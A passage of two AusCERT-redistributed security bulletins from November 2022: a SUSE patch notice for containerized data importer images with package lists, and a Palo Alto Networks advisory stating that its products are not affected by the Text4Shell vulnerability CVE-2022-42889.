kPnxfw3AvhQ=
=hcI4
-----END PGP SIGNATURE-----
ESB-2022.5777 - [SUSE] containerized data importer: CVSS (Max): None
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5777
Security update for containerized data importer
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: containerized data importer
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223920-1
Comment: CVSS (Max): None available when published
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for containerized data importer
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3920-1
Rating: important
References:
Affected Products:
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise Module for Containers 15-SP3
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Manager Proxy 4.2
SUSE Manager Retail Branch Server 4.2
SUSE Manager Server 4.2
openSUSE Leap 15.3
______________________________________________________________________________
An update that contains security fixes can now be installed.
Description:
This update of containerized data importer images rebases the containers
against the current base images to resolve security issues.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3920=1
o SUSE Linux Enterprise Module for Containers 15-SP3:
zypper in -t patch SUSE-SLE-Module-Containers-15-SP3-2022-3920=1
Package List:
o openSUSE Leap 15.3 (x86_64):
containerized-data-importer-api-1.43.2-150300.8.11.1
containerized-data-importer-api-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-cloner-1.43.2-150300.8.11.1
containerized-data-importer-cloner-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-controller-1.43.2-150300.8.11.1
containerized-data-importer-controller-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-importer-1.43.2-150300.8.11.1
containerized-data-importer-importer-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-manifests-1.43.2-150300.8.11.1
containerized-data-importer-operator-1.43.2-150300.8.11.1
containerized-data-importer-operator-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-uploadproxy-1.43.2-150300.8.11.1
containerized-data-importer-uploadproxy-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-uploadserver-1.43.2-150300.8.11.1
containerized-data-importer-uploadserver-debuginfo-1.43.2-150300.8.11.1
obs-service-cdi_containers_meta-1.43.2-150300.8.11.1
o SUSE Linux Enterprise Module for Containers 15-SP3 (x86_64):
containerized-data-importer-manifests-1.43.2-150300.8.11.1
References:
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yGi8kNZI30y1K9AQjO9w/9HL4u8ns9X5eee7854ecGRzDGXIq+2UX7
wK1/WQcgZ3bDGlej3HEKIx5H/BjECQIycU61rHAofQS/V1dnjXDV7OwvO2JajVVp
SJLmF89ggCS8N7FNpTTOmlF6XcP+QvwDa8ba7Pm4W0N60OkO5eEKl3vKKD2iAtTc
PsVcLxDiqipshbN13OghjcRx1tbYT+2DNIPYQwi2FIUuqXy/FmJY7N/E4ymKOZxQ
62eWs5UKluqZP0maBwxXT03nNMOrGc7DDHJFehizMPlBAPqxP1UcJWYG0ne85bD8
W1FWI7lcohjO74SjPGCc1Wss2F8Vam0W40rFTikfsnskgeOWWCLLU0HRwQ4Tiuco
CJWqxUOV9rGH/cJisIP2H5VNcpffrlB37+TG+eoPA4a1MM3NNDtSICpQtJRl63fL
V9XIV6Rj+l4AxKImFEC6Xq35dBQjtU6FGo2EgPM+4bmwgaqhdNp8gJBcDzEkfdP4
wjiploawJ52o4vGUw58xue81oStCAHP2GWhGw0EjDv/ePkvvPqMBZn+yhTIIb2e7
vBHFFUjhFZ72GLt5KvNrBhRWSFTJlScnaSNfPok5+a8dfgYnTN5lZfgkMILEoA74
esDsX0JiUkylGTY8XcJhda+SnUSJxP+tW1ZPNYrPUg72yMcGStf/vMqMKo2kP4xS
h9IvmypuYT4=
=7PN4
-----END PGP SIGNATURE-----
ESB-2022.5776 - Palo Alto Products: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5776
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Palo Alto Products
Publisher: Palo Alto Networks
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Network Appliance
Virtualisation
Resolution: Mitigation
CVE Names: CVE-2022-42889
Original Bulletin:
https://securityadvisories.paloaltonetworks.com/CVE-2022-42889
Comment: CVSS (Max): 9.8 CVE-2022-42889 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
Palo Alto Networks Security Advisories / CVE-2022-42889
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
[INFO]
Informational
NVD JSON
Published 2022-11-09
Updated 2022-11-09
Reference CVE-2022-42889
Discovered externally
Description
Palo Alto Networks has evaluated the Apache Commons Text library vulnerability
CVE-2022-42889, known as Text4Shell, for all products and services.
The Palo Alto Networks Product Security Assurance team has confirmed that all
products and services are not impacted by this vulnerability.
Product Status
Versions Affected Unaffected
AutoFocus None all
Bridgecrew None all
Cloud NGFW None all
Cortex Data Lake None all
Cortex XDR None all
Cortex XDR Agent None all
Cortex Xpanse None all
Cortex XSOAR None all
Enterprise Data Loss Prevention None all
Exact Data Matching CLI None all
Expanse None all
Expedition Migration Tool None all
GlobalProtect App None all
IoT Security None all
Okyo Garde None all
Palo Alto Networks App for Splunk None all
PAN-OS None all
Prisma Access None all
Prisma Cloud None all
Prisma Cloud Compute None all
Prisma SD-WAN (CloudGenix) None all
Prisma SD-WAN ION None all
SaaS Security None all
User-ID Agent None all
WildFire Appliance (WF-500) None all
WildFire Cloud None all
Exploitation Status
Palo Alto Networks is not aware of any malicious exploitation of this issue on
any of our products.
Weakness Type
CWE-94 Improper Control of Generation of Code ('Code Injection')
Solution
No software updates are required at this time.
Workarounds and Mitigations
Customers with a Threat Prevention subscription can block known attacks for
CVE-2022-42889 by enabling Threat ID 93157 (Applications and Threats content
update 8632). This mitigation reduces the risk of exploitation from known
exploits.
Timeline
2022-11-09 Initial publication
Terms of usePrivacyProduct Security Assurance and Vulnerability Disclosure
Policy Report vulnerabilitiesManage subscriptions
(C) 2022 Palo Alto Networks, Inc. All rights reserved.
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yFWckNZI30y1K9AQianA/7BnRPOP+mGDw+2kSPFv40tY8o4vlRPid8
hrLArFHjaoygN9S07kOeQKWAEQEY9vJR1AeqDtMn3Pfuwymi+5IZ9Aniid/QVlIY
/jD2N4PJQWyk2N0Zp/7YlC9XwWp5ws82o0/qh4xEn16RHn0V3y9CMrnRUP0ymzxh
92dV54F6l6dLdGVbLdOKBjzs6MbtYVkkzpdNFYQzEFBWUX/sTaebwgEp/U0hhRGz
oFKi4hw0jqoT9qPbNZ5HjrtM7Ub1xyHSEW5tiYVpPq48a/hwKXcH7L0AZFLvENyd
dGl0LM93ua8c5jje47buPG0gv8u6cFRf8oBe7oI3OdXqa/ItwIJeWhGk8z7eFX69
8dTKDB9c7AjV6N7GYknDTSi2gqhF51LEyNNdMOWa9IqEw/XLvo+iUtQRYYQthNfU
llsBGIKiGxvkeVlnMJwf0Rv77Dsd6SDvkrHiKBhVf/V/b0Ir7aJ4Vvs/2Ev8yasp
67bibA12ROmFSNjZE3wuy5yGIUXTgg+b6xG4J3l9rnb0jpCDFV9ubXAlq+SY/yDK
nVw8bjX/23Mi485h3/yj/AEl0Zgr0Qd/rXwXT1xDZnkyQyp5pGYtyMHqFsYGqh+k
vm1CKw55B1u0hvNwVVP/EVD7d0oAmU4CyYmR+kYFs7xCJoI+GRXOQwMjjt4EyvCG
EU9WF6WHMHo=
=Ze+o
-----END PGP SIGNATURE-----